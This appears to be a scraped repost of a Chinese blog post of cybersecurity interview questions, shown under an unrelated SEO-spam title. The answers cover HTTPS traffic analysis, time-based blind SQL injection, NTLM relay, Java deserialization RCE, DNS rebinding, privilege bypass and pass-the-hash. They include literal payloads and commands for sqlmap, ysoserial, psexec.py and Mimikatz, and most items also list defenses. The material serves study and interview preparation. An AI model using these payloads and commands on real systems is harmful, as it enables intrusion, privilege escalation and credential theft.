当前位置: 首页> 游戏> 单机 > 大连建设工程信息网站_园区智慧管理平台_一级造价工程师_seo优化网站查询

大连建设工程信息网站_园区智慧管理平台_一级造价工程师_seo优化网站查询

时间:2025/7/11 15:42:48来源:https://blog.csdn.net/persist213/article/details/147031828 浏览次数:0次
大连建设工程信息网站_园区智慧管理平台_一级造价工程师_seo优化网站查询

《网安面试指南》https://mp.weixin.qq.com/s/RIVYDmxI9g_TgGrpbdDKtA?token=1860256701&lang=zh_CN

5000篇网安资料库https://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247486065&idx=2&sn=b30ade8200e842743339d428f414475e&chksm=c0e4732df793fa3bf39a6eab17cc0ed0fca5f0e4c979ce64bd112762def9ee7cf0112a7e76af&scene=21#wechat_redirect

1. HTTPS流量分析(SQL注入识别)

题目:如何从HTTPS流量中识别SQL注入攻击?
答案

  • 解密方法
    1. 浏览器导出SSLKEYLOGFILE,Wireshark配置TLS会话密钥。

    2. 解密后筛选HTTP流量,搜索UNION SELECTSLEEP(等关键词。

  • 特征:异常长的URL参数、重复的单引号或注释符(如--)。

  • 工具:Wireshark、Burp Suite历史记录分析。

2. 时间盲注利用

题目:某SQL注入点无回显但未过滤SLEEP(),如何盲注获取数据库名长度?
答案

  • Payload
    ' AND IF(LENGTH(DATABASE())=8, SLEEP(5), 0)--

  • 自动化工具sqlmap -u "目标URL" --technique=T --time-sec=5 --dbms=mysql

  • 原理:通过响应时间差异判断条件真假。

3. NTLM Relay攻击

题目:内网中如何利用NTLM Relay攻击获取域控权限?
答案

  • 步骤
    1. 使用ResponderImpacket监听SMB/LDAP请求。

    2. 触发目标机器向攻击者发送NTLM认证(如钓鱼链接file://attackIP/恶意文件)。

    3. 将NTLM Hash Relay到域控,执行命令(如添加用户)。

  • 防御:启用SMB签名、限制NTLM使用。

4. 反序列化漏洞(RCE)

题目:某Java应用使用Apache Commons Collections 3.1,如何构造Payload实现RCE?
答案

  • 利用链InvokerTransformer链触发Runtime执行命令。

  • 工具:使用ysoserial生成Payload:
    java -jar ysoserial.jar CommonsCollections5 "cmd.exe /c calc" > payload.bin

  • 防御:升级依赖库、禁用危险反序列化类。

5. DNS Rebinding攻击

题目:解释DNS Rebinding攻击原理及防御方法。
答案

  • 原理:恶意网页通过短TTL域名绑定到内网IP,绕过同源策略攻击内网服务。

  • 防御
    • 浏览器限制DNS解析缓存时间。

    • 内网设备禁止响应外部DNS解析请求。

    • 应用层校验Host头与请求来源IP。

6. 垂直越权漏洞

题目:某CMS管理后台通过/admin路径判断权限,普通用户请求此路径返回403。如何绕过?
答案

  • 方法1:伪造Cookie或JWT令牌提升权限(如修改role=admin)。

  • 方法2:直接访问后台API接口(如/admin/addUser),绕过前端路由校验。

  • 防御:服务端校验用户角色、RBAC权限控制。

7. 内网横向移动(Pass the Hash)

题目:已获取内网某主机的NTLM Hash,如何横向移动到另一台主机?
答案

  • 工具
    • psexec.pypython psexec.py -hashes :<NTLM_Hash> DOMAIN/user@目标IP

    • Mimikatzsekurlsa::pth /user:Administrator /domain:test.com /ntlm:HASH

  • 防御:启用LSA保护、限制管理员账户登录范围。

关键字:大连建设工程信息网站_园区智慧管理平台_一级造价工程师_seo优化网站查询

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: